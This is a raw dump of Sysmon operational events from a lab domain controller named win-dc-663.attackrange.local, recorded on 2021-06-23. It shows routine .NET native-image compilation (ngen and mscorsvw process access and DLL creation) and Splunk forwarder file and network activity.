AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53A1AB4DDDD6A20DC375D174865CB8B1,SHA256=82A8D425CA7CE7A9EDA34A4BEE0F0CF9EF316BD1B630ECECD1C608933873B52C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A204-60D3-4E04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.770{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A204-60D3-4E04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:08.770{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A204-60D3-4E04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:08.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A204-60D3-4D04-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.692{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A204-60D3-4D04-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:08.692{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A204-60D3-4D04-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.676{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F765E23A5F30B500F8943DAB11687D9A,SHA256=FC4AFED1A89BD6037F3B65A263DE842E301BBE2C6FB492839FC8E271A67909E7,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x800000000000000021371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:08.551{4DB9351A-A203-60D3-4C04-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1944-0\PresentationUI.dll2021-06-23 21:05:08.551 23542300x800000000000000021381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:09.958{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F4C538636DEB9C44DA7967F84F1E5E6,SHA256=38A81DEEED83CF8F4A1979659B23570DE553BD6205C07E16F7102C82CBCA1A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:09.708{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83029E4547FC17C3765E29E4FC5116EA,SHA256=174B5C8F926F26ADA495135E69C2F872F170747FDB10C3C86516AAFCCDB88AB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:10.984{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A206-60D3-4F04-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:10.968{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE1710ED13A4BAFA0824CADF5CD1AEDC,SHA256=CAE1DE25FEEDDA4B13F8E2AD9F26587303FD74C063488F2E042282DE58360218,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:10.953{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A206-60D3-4F04-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:10.953{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A206-60D3-4F04-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:10.828{4DB9351A-A204-60D3-4E04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cb8-0\ReachFramework.dll2021-06-23 21:05:10.828 354300x800000000000000021382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.091{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61435-false10.0.1.12-8000- 23542300x800000000000000021405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.955{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08AFAFB07B1C982F3C49329E6FAE1CA3,SHA256=85EF5B7190CE9A78A59AD487C1F57C033D8C2F559256564886AAA5E721CF69E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A207-60D3-5404-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:11.640{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A207-60D3-5404-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.640{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A207-60D3-5404-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:11.578{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A207-60D3-5304-00000000CF01}7152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.562{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A207-60D3-5304-00000000CF01}7152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:17.765{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20D-60D3-5D04-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:17.703{4DB9351A-A20D-60D3-5C04-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19f4-0\System.Activities.DurableInstancing.dll2021-06-23 21:05:17.703 10341000x800000000000000021444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:17.390{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A20D-60D3-5C04-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.374{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A20D-60D3-5C04-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:17.374{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A20D-60D3-5C04-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:17.218{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A20D-60D3-5B04-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:17.203{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A20D-60D3-5B04-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
